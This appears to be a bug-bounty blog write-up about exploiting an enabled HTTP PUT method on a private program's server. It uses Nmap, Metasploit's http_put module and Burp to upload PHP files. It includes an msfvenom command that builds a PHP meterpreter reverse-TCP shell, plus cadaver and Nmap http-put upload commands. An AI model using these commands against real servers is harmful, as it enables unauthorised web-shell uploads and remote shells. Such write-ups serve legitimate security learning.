HTTP PUT Method Exploit
exploiting HTTP PUT Method at private program while doing some recon and create malicious files on the server.
Last updated
exploiting HTTP PUT Method at private program while doing some recon and create malicious files on the server.
Last updated
Hello Hackers, Hope you are well !!
Today I'll talk about one of the most basic web attacks that recently faced me while doing bug hunting at private program which is exploiting enabled HTTP PUT Method.
The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.
If the target resource does not have a current representation and the PUT request successfully creates one, then the origin server must inform the user agent by sending a 201 (Created) response.
If the target resource does have a current representation and that representation is successfully modified in accordance with the state of the enclosed representation, then the origin server must send either a 200 (OK) or a 204 (No Content) response to indicate successful completion of the request.
while doing some recon on private program after gathering subdomains i always convert live.txt to IPs to run some port scanning using simple go script h2i
since this program have a small scope i got some few IPs, in this situation i prefer using Nmap on masscan.
after few minutes i got very interesting result which was something like this.
without wasting any time i quickly opened metasploit to check if PUT method allowing uploading or creating any files in this subdomain.
create some test txt file to try uploading it to web server
by using auxiliary/scanner/http/http_put module on metasploit we can scan http put method
after visiting this path on vulnerable domain we can notice that the injection worked fine.
As we all knows BurpSuite is one of the most popular proxy intercepting tool through which you can easily analyze all kind of GET and POST requests.
Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Security. The important tools inside BurpSuite are HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.
by intercepting GET request to http://redact.redact.redact.target.com and change it to PUT, we can create files & and add any content to it.
send Get request to this newly created file http://redact.redact.redact.target.com/strik3rpoc.php we can see that it`s also created successfully.
⭐ Golden TIP: "always try to escalate". with that being said, i tried to get Remote Code Execution by creating some malicious php code in this file.
attempt to execute any command with injected parameter cmd but got nothing back.
Tried many ways to get commands runs but no luck 😥 the file is always reflecting it`s content without execute any command.
i`ve tried to upload PHP malicious file which we’ll generate with the help of msfvenom command.
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php
Now run Cadaver tool which is already installed in every Kali Linux machine. Cadaver is a command line tool that support uploading and downloading of a files on webdav.
To run Cadaver, the command is:
cadaver http://target.com/
If all is good till now we can upload the shell.php file which you’ve created with msfvenom.
but i do not know why it did`t work with me ¯\_(ツ)_/¯
Anyways when you face this situation you can upload shell via metasploit like above step or you can use Nmap script to upload it with this command:
nmap -p 80 target.com –-script http-put –-script-args http-put.url='strik3r_nmap.php",http-put.file="/root/shell.php'
Thanks For Reading
